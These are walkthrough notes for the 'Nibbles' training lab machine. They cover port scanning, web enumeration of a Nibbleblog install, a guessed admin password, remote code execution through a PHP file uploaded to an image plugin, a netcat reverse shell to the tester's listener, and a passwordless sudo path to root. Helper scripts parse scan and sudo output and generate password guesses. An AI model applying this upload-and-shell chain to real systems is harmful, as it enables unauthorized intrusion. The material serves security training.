Nibbles Enumeration

Initial scan

nmap -sV --open -oA nibbles_initial_scan  10.129.200.170
 
" ======== about command ========
  -sV : service enumeration scan agains teh default port 1,1000 ports.
  --open : only return open ports.
  -oA : include XML output, greppable format, and text output. 
"

This scans the 1000 most common TCP ports and fingerprints the service on each open one.

┌─[us-academy-3]─[10.10.14.56]─[htb-ac-834467@htb-forxk8tsmw]─[~]
└──╼ [★]$ nmap -sV --open -oA nibbles_initial_scan  10.129.200.170
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-14 21:43 CDT
Nmap scan report for 10.129.200.170
Host is up (0.25s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.77 seconds

Based on the scan output, we can see that:

  1. An Apache web server (httpd 2.4.18) is exposed on port 80
  2. An OpenSSH server (7.2p2) is listening on port 22
  3. The host is likely Ubuntu Linux (both version strings carry the Ubuntu package suffix)
  4. SSH protocol version 2.0 is in use

List the home directory: three new files appeared once the initial scan finished.

┌─[us-academy-3]─[10.10.14.56]─[htb-ac-834467@htb-forxk8tsmw]─[~]
└──╼ [★]$ ls | grep nibble
nibbles_initial_scan.gnmap
nibbles_initial_scan.nmap
nibbles_initial_scan.xml

The files are:

  1. nibbles_initial_scan.gnmap (greppable: one line per host, easy to feed to grep/awk or a small parser)
  2. nibbles_initial_scan.nmap (normal: the same text that was printed on screen)
  3. nibbles_initial_scan.xml (XML: for importing into other tools)
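The .gnmap file is the one to hand to the next tool in the chain. As an added example (not part of the original notes), here is a small Python parser for it; the sample line is constructed from the scan output above, since the notes only list the file names, and the host/port/version values are the ones nmap reported.

```python
"""Parse nmap greppable output (the .gnmap file that -oA writes).

Added example, not part of the original notes. The sample below is
constructed from the scan output shown above (same host, same two
ports); it is what nmap would have written to nibbles_initial_scan.gnmap.
"""
import re
from dataclasses import dataclass


SAMPLE_GNMAP = """\
# Nmap 7.94SVN scan initiated Thu Aug 14 21:43:00 2025 as: nmap -sV --open -oA nibbles_initial_scan 10.129.200.170
Host: 10.129.200.170 ()\tStatus: Up
Host: 10.129.200.170 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.18 ((Ubuntu))/\tIgnored State: closed (998)
# Nmap done at Thu Aug 14 21:43:14 2025 -- 1 IP address (1 host up) scanned in 13.77 seconds
"""


@dataclass
class Port:
    host: str
    port: int
    proto: str
    state: str
    service: str
    version: str


def parse_gnmap(text: str) -> list:
    """Return one Port per entry found in the 'Ports:' field of each host line.

    A gnmap host line is tab-separated 'Key: value' fields. Each port entry
    has seven slash-separated fields, port/state/proto/owner/service/rpc/version/,
    and nmap rewrites any '/' inside a value as '|', so splitting on '/' is safe.
    """
    results = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = {}
        for field in line.split("\t"):
            key, _, value = field.partition(": ")
            fields[key] = value
        host = fields["Host"].split()[0]
        ports = fields.get("Ports", "")
        # entries are separated by ', ' but a version string may itself contain
        # a comma, so only split where the next entry (a port number and '/') begins
        for entry in re.split(r",\s+(?=\d+/)", ports):
            parts = entry.strip().split("/")
            if len(parts) < 7:
                continue
            port, state, proto, _owner, service, _rpc, version = parts[:7]
            results.append(Port(host, int(port), proto, state, service, version))
    return results


def open_ports(text: str) -> list:
    """Only the entries nmap reported as open (the --open filter, applied after the fact)."""
    return [p for p in parse_gnmap(text) if p.state == "open"]


if __name__ == "__main__":
    for p in open_ports(SAMPLE_GNMAP):
        print(f"{p.host}:{p.port}/{p.proto}  {p.service:<6} {p.version}")
```

The same parser works on the full-port and script-scan .gnmap files written later in these notes, since the host-line format does not change between scans.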

Run full TCP port scan

nmap -p- --open -oA nibbles_full_tcp_scan 10.129.200.170

" ======== about command ========
  -p- : scan all 65535 TCP ports instead of the default top 1000.
  --open : only show open ports.
  -oA : write normal, greppable and XML output using the given basename.
"

This checks for services on non-standard ports that the initial scan would have missed.

┌─[us-academy-3]─[10.10.14.56]─[htb-ac-834467@htb-forxk8tsmw]─[~]
└──╼ [★]$ nmap -p- --open -oA nibbles_full_tcp_scan 10.129.200.170
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-14 21:56 CDT
Nmap scan report for 10.129.200.170
Host is up (0.24s latency).
Not shown: 62495 closed tcp ports (reset), 3038 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 190.08 seconds

The scan finished without finding any additional open ports. Note that the -p- scan is slow (190 s here against 14 s for the initial scan) because it probes every port; start it in the background and keep enumerating the known services while it runs.

Do some banner grabbing to confirm what the Nmap enumeration told us.

  1. The target is running an Apache web server on port 80

┌─[us-academy-3]─[10.10.14.56]─[htb-ac-834467@htb-forxk8tsmw]─[~]
└──╼ [★]$ nc -nv 10.129.200.170 80
(UNKNOWN) [10.129.200.170] 80 (http) open

nc confirms port 80 is open but shows no banner: HTTP is a client-speaks-first protocol, so the server sends nothing (including its Server header) until we send a request.

  2. The target is running an OpenSSH server on port 22

┌─[us-academy-3]─[10.10.14.56]─[htb-ac-834467@htb-forxk8tsmw]─[~]
└──╼ [★]$ nc -nv 10.129.200.170 22
(UNKNOWN) [10.129.200.170] 22 (ssh) open
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2

Here the banner arrives immediately, because an SSH server sends its version string first; it matches what Nmap reported.
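The difference between the two nc results above is the whole trick of banner grabbing: wait for the service to speak, and if it stays silent, speak first. As an added example (not part of the original notes), the Python below does exactly that. Because the notes' target is not reachable from here, it runs against two local stand-ins constructed for the example, one that sends the SSH version string the scan reported and one that answers a HEAD request with the Apache Server header; those stand-ins are assumptions, not the real services.

```python
"""Banner grabbing that handles both kinds of service.

Added example, not part of the original notes. SSH speaks first, so a bare
connect (what nc -nv showed above) returns its banner; HTTP waits for a
request, so nc shows nothing until we send one. The two local servers at
the bottom are constructed stand-ins for the target that echo the banners
the scan reported; they are not the real services.
"""
import socket
import socketserver
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def grab_banner(host: str, port: int, timeout: float = 2.0) -> str:
    """Return whatever the service sends first; if it stays silent, send a
    minimal HTTP HEAD request and return the response headers instead."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        try:
            data = s.recv(1024)
            if data:
                return data.decode(errors="replace").strip()
        except socket.timeout:
            pass  # client-speaks-first protocol (HTTP): fall through and ask
        s.sendall(f"HEAD / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode())
        chunks = []
        try:
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
        except socket.timeout:
            pass
        return b"".join(chunks).decode(errors="replace").strip()


def server_header(banner: str) -> str:
    """Pull the Server: header out of an HTTP response, or '' if there is none."""
    for line in banner.splitlines():
        if line.lower().startswith("server:"):
            return line.split(":", 1)[1].strip()
    return ""


# --- constructed stand-ins for the target's two services -------------------

class FakeSSH(socketserver.BaseRequestHandler):
    def handle(self):
        # real sshd sends its identification string as soon as we connect
        self.request.sendall(b"SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2\r\n")


class FakeApache(BaseHTTPRequestHandler):
    def version_string(self):  # this is what goes into the Server: header
        return "Apache/2.4.18 (Ubuntu)"

    def do_HEAD(self):
        self.send_response(200)
        self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_servers() -> tuple:
    """Start both stand-ins on 127.0.0.1 and return (ssh_port, http_port)."""
    ssh = socketserver.TCPServer(("127.0.0.1", 0), FakeSSH)
    http = HTTPServer(("127.0.0.1", 0), FakeApache)
    for srv in (ssh, http):
        threading.Thread(target=srv.serve_forever, daemon=True).start()
    return ssh.server_address[1], http.server_address[1]


def demo() -> tuple:
    """Grab both banners; returns (ssh_banner, http_server_header)."""
    ssh_port, http_port = start_servers()
    ssh_banner = grab_banner("127.0.0.1", ssh_port)
    http_server = server_header(grab_banner("127.0.0.1", http_port))
    return ssh_banner, http_server


if __name__ == "__main__":
    print(demo())
```

Against the real box you would call grab_banner("10.129.200.170", 80) and grab_banner("10.129.200.170", 22); the HTTP case costs one timeout before the request is sent, which is the same delay nc would have spent showing nothing.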

Nmap script scan

nmap -sC -p 22,80 -oA nibbles_script_scan 10.129.200.170

" ======== about command ========
  -sC : run the default set of NSE scripts (same as --script=default) against the open ports.
  -p : restrict the scan to the listed ports (22,80), the ones we already know are open.
  -oA : write normal, greppable and XML output using the given basename.
"

Nibbles Web Footprinting

whatweb

  WhatWeb git:(master) ./whatweb 10.129.200.170
ERROR Opening: https://10.129.200.170 - Connection refused - connect(2) for "10.129.200.170" port 443
http://10.129.200.170 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.200.170]

curl

  WhatWeb git:(master) curl 10.129.200.170
<b>Hello world!</b>

<!-- /nibbleblog/ directory. Nothing interesting here! -->

The index page is only a placeholder, but the HTML comment points at /nibbleblog/.

whatweb /nibbleblog

  WhatWeb git:(master) ./whatweb 10.129.200.170/nibbleblog
http://10.129.200.170/nibbleblog [301 Moved Permanently] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.200.170], RedirectLocation[http://10.129.200.170/nibbleblog/], Title[301 Moved Perm
anently]
http://10.129.200.170/nibbleblog/ [200 OK] Apache[2.4.18], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.200.170], JQuery, MetaGenerator[Nibbleblog], PoweredBy[Nibbleblog], Script, Title[Nibbles - Yum yum]
whatweb identifies the application under /nibbleblog/ as Nibbleblog (MetaGenerator and PoweredBy tags) and sees a PHPSESSID cookie, so it is a PHP blog engine.

Directory enumeration under /nibbleblog/ with gobuster

  sc ./gobuster/gobuster dir -u http://10.129.200.170/nibbleblog/ --wordlist SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.200.170/nibbleblog/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 304]
/.htaccess            (Status: 403) [Size: 309]
/.htpasswd            (Status: 403) [Size: 309]
/README               (Status: 200) [Size: 4628]
/admin                (Status: 301) [Size: 327] [--> http://10.129.200.170/nibbleblog/admin/]
/admin.php            (Status: 200) [Size: 1401]
/content              (Status: 301) [Size: 329] [--> http://10.129.200.170/nibbleblog/content/]
/index.php            (Status: 200) [Size: 2987]
/languages            (Status: 301) [Size: 331] [--> http://10.129.200.170/nibbleblog/languages/]
/plugins              (Status: 301) [Size: 329] [--> http://10.129.200.170/nibbleblog/plugins/]
/themes               (Status: 301) [Size: 328] [--> http://10.129.200.170/nibbleblog/themes/]
Progress: 4750 / 4750 (100.00%)
===============================================================
Finished
===============================================================
/README, /admin.php and /content stand out: README should give the version, admin.php is the login page, and content is where Nibbleblog keeps its data.

curl README

  sc curl http://10.129.200.170/nibbleblog/README
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01
 
Site: http://www.nibbleblog.com
Blog: http://blog.nibbleblog.com
Help & Support: http://forum.nibbleblog.com
Documentation: http://docs.nibbleblog.com
 
===== Social =====
* Twitter: http://twitter.com/nibbleblog
* Facebook: http://www.facebook.com/nibbleblog
* Google+: http://google.com/+nibbleblog
 
===== System Requirements =====
* PHP v5.2 or higher
* PHP module - DOM
* PHP module - SimpleXML
* PHP module - GD
* Directory “content” writable by Apache/PHP
 
Optionals requirements
 
* PHP module - Mcrypt

Check /nibbleblog/content/: the content tree, including its private/ subdirectory, is readable without authentication, so we can pull Nibbleblog's XML data files directly.

private user content (content/private/users.xml)

  sc curl -s http://10.129.200.170/nibbleblog/content/private/users.xml | xmllint  --format -
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<users>
  <user username="admin">
    <id type="integer">0</id>
    <session_fail_count type="integer">0</session_fail_count>
    <session_date type="integer">1514544131</session_date>
  </user>
  <blacklist type="string" ip="10.10.10.1">
    <date type="integer">1512964659</date>
    <fail_count type="integer">1</fail_count>
  </blacklist>
</users>
This gives us a valid username, admin, and shows that Nibbleblog keeps a per-IP blacklist of failed logins, so brute-forcing the login form is a bad idea.

Additional directory enumeration against the web root:

  sc ./gobuster/gobuster dir -u http://10.129.200.170 --wordlist SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.200.170
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 293]
/.htpasswd            (Status: 403) [Size: 298]
/.htaccess            (Status: 403) [Size: 298]
/index.html           (Status: 200) [Size: 93]
/server-status        (Status: 403) [Size: 302]
Progress: 4750 / 4750 (100.00%)
===============================================================
Finished
===============================================================
Nothing new at the root: only the placeholder index.html and the usual Apache-protected files.

Taking another look at the other file under content/private, config.xml:

  sc curl -s http://10.129.200.170/nibbleblog/content/private/config.xml | xmllint --format -
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<config>
  <name type="string">Nibbles</name>
  <slogan type="string">Yum yum</slogan>
  <footer type="string">Powered by Nibbleblog</footer>
  <advanced_post_options type="integer">0</advanced_post_options>
  <url type="string">http://10.10.10.134/nibbleblog/</url>
  <path type="string">/nibbleblog/</path>
  <items_rss type="integer">4</items_rss>
  <items_page type="integer">6</items_page>
  <language type="string">en_US</language>
  <timezone type="string">UTC</timezone>
  <timestamp_format type="string">%d %B, %Y</timestamp_format>
  <locale type="string">en_US</locale>
  <img_resize type="integer">1</img_resize>
  <img_resize_width type="integer">1000</img_resize_width>
  <img_resize_height type="integer">600</img_resize_height>
  <img_resize_quality type="integer">100</img_resize_quality>
  <img_resize_option type="string">auto</img_resize_option>
  <img_thumbnail type="integer">1</img_thumbnail>
  <img_thumbnail_width type="integer">190</img_thumbnail_width>
  <img_thumbnail_height type="integer">190</img_thumbnail_height>
  <img_thumbnail_quality type="integer">100</img_thumbnail_quality>
  <img_thumbnail_option type="string">landscape</img_thumbnail_option>
  <theme type="string">simpler</theme>
  <notification_comments type="integer">1</notification_comments>
  <notification_session_fail type="integer">0</notification_session_fail>
  <notification_session_start type="integer">0</notification_session_start>
  <notification_email_to type="string">admin@nibbles.com</notification_email_to>
  <notification_email_from type="string">noreply@10.10.10.134</notification_email_from>
  <seo_site_title type="string">Nibbles - Yum yum</seo_site_title>
  <seo_site_description type="string"/>
  <seo_keywords type="string"/>
  <seo_robots type="string"/>
  <seo_google_code type="string"/>
  <seo_bing_code type="string"/>
  <seo_author type="string"/>
  <friendly_urls type="integer">0</friendly_urls>
  <default_homepage type="integer">0</default_homepage>
</config>
config.xml gives the site name (Nibbles) and an admin mailbox (admin@nibbles.com) but no password.

There is no default Nibbleblog password to look up, so guess from what we have: the username admin from users.xml and the site name from config.xml. admin:nibbles works on /nibbleblog/admin.php. Keep the guesses to a handful; users.xml showed that Nibbleblog blacklists an IP after repeated failed logins.


Nibbles Initial Foothold

In the admin panel, the My Image plugin lets us upload a file as the plugin's image, and it accepts a .php file. Upload one containing:

<?php system('id'); ?>

The upload produces a set of PHP warnings (the plugin tries to resize the "image" with GD, which fails because the file is not an image), but the file is still written:

Warning: imagesx() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 26
 
Warning: imagesy() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 27
 
Warning: imagecreatetruecolor(): Invalid image dimensions in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 117
 
Warning: imagecopyresampled() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 118
 
Warning: imagejpeg() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 43
 
Warning: imagedestroy() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 80

Now request the uploaded file. The plugin stores its upload as image.php under content/private/plugins/my_image/ (inside the content directory we found during directory enumeration), and the response shows our PHP ran as the web server user:

  nibbles curl http://10.129.200.170/nibbleblog/content/private/plugins/my_image/image.php
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)

Craft a reverse shell PHP script: the same system() wrapper as before, but running a mkfifo/nc reverse shell that connects back to our listener (10.10.14.56:9443 in this session). The one-liner itself is shown in the Initial Foothold notes at the end of this page.


Upload it through the same plugin, then start a listener for the reverse shell:

  nibbles ncat -nvlp 9443
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:9443
Ncat: Listening on 0.0.0.0:9443

Trigger it by requesting the uploaded file with curl. This curl will hang for as long as the shell is alive, because image.php never finishes, so run it in a separate terminal:

  sc curl http://10.129.200.170/nibbleblog/content/private/plugins/my_image/image.php

Back on the listener we get a connection:

  nibbles ncat -nvlp 9443
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:9443
Ncat: Listening on 0.0.0.0:9443
Ncat: Connection from 10.129.200.170:47760.
/bin/sh: 0: can't access tty; job control turned off
$

Run id to confirm who we are:

  nibbles ncat -nvlp 9443
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:9443
Ncat: Listening on 0.0.0.0:9443
Ncat: Connection from 10.129.200.170:47760.
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
$

Upgrade to a proper TTY using python3:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Go to /home/nibbler and read user.txt; this is the flag for the initial foothold:

nibbler@Nibbles:/home/nibbler$ ls
ls
personal.zip  user.txt
nibbler@Nibbles:/home/nibbler$ cat user.txt
cat user.txt
79c03865431abf47b90ef24b9695e148
nibbler@Nibbles:/home/nibbler$

the flag is 79c03865431abf47b90ef24b9695e148.


Privilege Escalation

Checking our privileges in the reverse shell with whoami shows we are not root:

nibbler@Nibbles:/home/nibbler$ whoami
whoami
nibbler
nibbler@Nibbles:/home/nibbler$

Next we need to escalate to root. Running LinEnum.sh shows that nibbler can run one script as root via sudo without a password, /home/nibbler/personal/stuff/monitor.sh. That path sits inside nibbler's own home directory (owned nibbler:nibbler in the /home listing below), so nibbler controls what the script contains, and whatever is placed there runs as root when invoked through sudo. Also note PermitRootLogin yes in the SSH configuration.

[-] Super user account(s):
root
 
 
[+] We can sudo without supplying a password!
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
 
 
[+] Possible sudo pwnage!
/home/nibbler/personal/stuff/monitor.sh
 
 
[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x  3 root    root    4.0K Dec 10  2017 .
drwxr-xr-x 23 root    root    4.0K Mar 12  2024 ..
drwxr-xr-x  4 nibbler nibbler 4.0K Aug 28 02:16 nibbler
 
 
[-] Root is allowed to login via SSH:
PermitRootLogin yes
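The check a practitioner applies to a finding like the sudo entry above is not "is the file writable" but "do I own anything on the way to it". As an added example (not part of the original notes), the Python below parses the sudo excerpt from the LinEnum output and walks the target path upwards against an ownership table constructed from the ls -la /home listing in that same output; only those three directories are known from the page, so the table is an assumption beyond them.

```python
"""Triage a sudo -l / LinEnum finding: can the user control the NOPASSWD target?

Added example, not part of the original notes. SUDO_L is the sudo excerpt
from the LinEnum output above; OWNERS is constructed from the 'ls -la /home'
listing in the same output. Only those three directories are known from the
page, so the walk stops at the nearest ancestor we do know about.
"""
import posixpath
import re

SUDO_L = """\
User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""

# constructed from the /home listing in the LinEnum output (assumption: nothing else known)
OWNERS = {"/": "root", "/home": "root", "/home/nibbler": "nibbler"}

# matches "(root) NOPASSWD: /path/to/cmd" and "(ALL : ALL) ALL" style lines
RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(text: str) -> list:
    """One dict per command line in sudo -l output (runas, nopasswd flag, command)."""
    rules = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue
        tags = m.group("tags").replace(":", " ").split()
        rules.append({"runas": m.group("runas").strip(),
                      "nopasswd": "NOPASSWD" in tags,
                      "cmd": m.group("cmd").strip()})
    return rules


def controlling_path(path: str, owners: dict, user: str):
    """Walk from the file up to '/', returning the first path owned by user, else None.

    Owning any ancestor directory is enough: the user can rename or delete the
    target and drop their own file at the same path, so the file itself being
    root-owned (or absent) does not protect a sudo rule that names it."""
    p = path
    while True:
        if owners.get(p) == user:
            return p
        parent = posixpath.dirname(p)
        if parent == p:
            return None
        p = parent


def triage(sudo_text: str = SUDO_L, owners: dict = OWNERS, user: str = "nibbler") -> list:
    """(cmd, runas, controlling_path) for every passwordless rule the user can hijack."""
    hits = []
    for rule in parse_sudo_l(sudo_text):
        if not rule["nopasswd"] or rule["cmd"] == "ALL":
            continue
        cmd = rule["cmd"].split()[0]  # drop any arguments sudoers pins to the command
        via = controlling_path(cmd, owners, user)
        if via:
            hits.append((cmd, rule["runas"], via))
    return hits


if __name__ == "__main__":
    for cmd, runas, via in triage():
        print(f"{cmd} runs as {runas} without a password and lives under {via}, which we own")
```

On a live box you would build the owners table from os.stat on each path component instead of a constructed dict; the walk itself is the same.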

Nibbles Footprinting (second run, different target IP)

Check with WhatWeb

  WhatWeb-6.0.1 ./whatweb http://10.129.102.62/
http://10.129.102.62/ [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.102.62]

Check with curl

  WhatWeb-6.0.1 curl http://10.129.102.62/
<b>Hello world!</b>

<!-- /nibbleblog/ directory. Nothing interesting here! -->

whatweb against the nibbleblog path

  WhatWeb-6.0.1 ./whatweb http://10.129.102.62/nibbleblog
http://10.129.102.62/nibbleblog [301 Moved Permanently] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.102.62], RedirectLocation[http://10.129.102.62/nibbleblog/], Title[301 Moved Permanently]
http://10.129.102.62/nibbleblog/ [200 OK] Apache[2.4.18], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.102.62], JQuery, MetaGenerator[Nibbleblog], PoweredBy[Nibbleblog], Script, Title[Nibbles - Yum yum]

Directory Enumeration

  sc ./gobuster/gobuster dir -u http://10.129.102.62/nibbleblog/ --wordlist ~/Documents/sc/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.102.62/nibbleblog/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /Users/rvn/Documents/sc/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 303]
/.htpasswd            (Status: 403) [Size: 308]
/.htaccess            (Status: 403) [Size: 308]
/README               (Status: 200) [Size: 4628]
/admin                (Status: 301) [Size: 325] [--> http://10.129.102.62/nibbleblog/admin/]
/admin.php            (Status: 200) [Size: 1401]
/content              (Status: 301) [Size: 327] [--> http://10.129.102.62/nibbleblog/content/]
/index.php            (Status: 200) [Size: 2987]
/languages            (Status: 301) [Size: 329] [--> http://10.129.102.62/nibbleblog/languages/]
/plugins              (Status: 301) [Size: 327] [--> http://10.129.102.62/nibbleblog/plugins/]
/themes               (Status: 301) [Size: 326] [--> http://10.129.102.62/nibbleblog/themes/]
Progress: 4750 / 4750 (100.00%)
===============================================================
Finished
===============================================================

/README

  sc curl http://10.129.102.62/nibbleblog/README
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01
 
Site: http://www.nibbleblog.com
Blog: http://blog.nibbleblog.com
Help & Support: http://forum.nibbleblog.com
Documentation: http://docs.nibbleblog.com
 
===== Social =====
* Twitter: http://twitter.com/nibbleblog
* Facebook: http://www.facebook.com/nibbleblog
* Google+: http://google.com/+nibbleblog
 
===== System Requirements =====
* PHP v5.2 or higher
* PHP module - DOM
* PHP module - SimpleXML
* PHP module - GD
* Directory “content” writable by Apache/PHP

So the Nibbleblog version is v4.0.3. The /content tree is readable and /admin.php is the login page. Look at users.xml:

  sc curl -s http://10.129.224.196/nibbleblog/content/private/users.xml | xmllint --format -
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<users>
  <user username="admin">
    <id type="integer">0</id>
    <session_fail_count type="integer">2</session_fail_count>
    <session_date type="integer">1755754989</session_date>
  </user>
  <blacklist type="string" ip="10.10.10.1">
    <date type="integer">1512964659</date>
    <fail_count type="integer">1</fail_count>
  </blacklist>
  <blacklist type="string" ip="10.10.14.117">
    <date type="integer">1755754975</date>
    <fail_count type="integer">5</fail_count>
  </blacklist>
</users>
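Both copies of users.xml on this page (the first run and this one) carry the same two facts: the only account is admin, and Nibbleblog writes a blacklist entry per source IP with a failure count, this one showing 10.10.14.117 at 5 failures. As an added example (not part of the original notes), the Python below parses those files and derives the short list of password guesses the site identity suggests, which generalises the admin:nibbles guess used earlier. The XML documents are constructed from the curl output shown on this page (config.xml trimmed to the fields used).

```python
"""Extract what matters from Nibbleblog's unauthenticated content/private XML.

Added example, not part of the original notes. The two documents below are
constructed from the users.xml and config.xml shown on this page (the
users.xml is this second run's copy, which has the extra blacklist entry),
so the values match the curl output; config.xml is trimmed to the fields used.
"""
import xml.etree.ElementTree as ET
from datetime import datetime, timezone

USERS_XML = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<users>
  <user username="admin">
    <id type="integer">0</id>
    <session_fail_count type="integer">2</session_fail_count>
    <session_date type="integer">1755754989</session_date>
  </user>
  <blacklist type="string" ip="10.10.10.1">
    <date type="integer">1512964659</date>
    <fail_count type="integer">1</fail_count>
  </blacklist>
  <blacklist type="string" ip="10.10.14.117">
    <date type="integer">1755754975</date>
    <fail_count type="integer">5</fail_count>
  </blacklist>
</users>
"""

CONFIG_XML = """<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<config>
  <name type="string">Nibbles</name>
  <slogan type="string">Yum yum</slogan>
  <url type="string">http://10.10.10.134/nibbleblog/</url>
  <notification_email_to type="string">admin@nibbles.com</notification_email_to>
</config>
"""


def _utc(epoch_text: str) -> str:
    """Nibbleblog stores times as Unix epochs; render them readably (UTC)."""
    return datetime.fromtimestamp(int(epoch_text), tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")


def parse_users(xml_text: str) -> dict:
    """Usernames plus the per-IP failed-login blacklist Nibbleblog keeps."""
    root = ET.fromstring(xml_text)
    users = [{"username": u.get("username"),
              "fail_count": int(u.findtext("session_fail_count", "0")),
              "last_session": _utc(u.findtext("session_date", "0"))}
             for u in root.findall("user")]
    blacklist = [{"ip": b.get("ip"),
                  "fail_count": int(b.findtext("fail_count", "0")),
                  "date": _utc(b.findtext("date", "0"))}
                 for b in root.findall("blacklist")]
    return {"users": users, "blacklist": blacklist}


def password_candidates(config_text: str) -> list:
    """Guesses from the site identity: name, slogan, admin mailbox and its domain.
    Keep the list short; users.xml shows failed logins get a source IP blacklisted."""
    root = ET.fromstring(config_text)
    words = set(root.findtext("name", "").split())
    words.update(root.findtext("slogan", "").split())
    email = root.findtext("notification_email_to", "")
    if "@" in email:
        local, domain = email.split("@", 1)
        words.add(local)
        words.add(domain.split(".")[0])
    return sorted({w.lower() for w in words if len(w) > 2})


def report(users_xml: str = USERS_XML, config_xml: str = CONFIG_XML) -> str:
    info = parse_users(users_xml)
    lines = [f"user {u['username']} (failed logins: {u['fail_count']}, last seen {u['last_session']})"
             for u in info["users"]]
    lines += [f"blacklisted {b['ip']} after {b['fail_count']} failure(s) on {b['date']}"
              for b in info["blacklist"]]
    lines.append("candidate passwords: " + ", ".join(password_candidates(config_xml)))
    return "\n".join(lines)


if __name__ == "__main__":
    print(report())
```

Feed it the live files with curl -s .../content/private/users.xml and config.xml; the blacklist timestamps tell you whether someone else is already hammering the login from your range.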

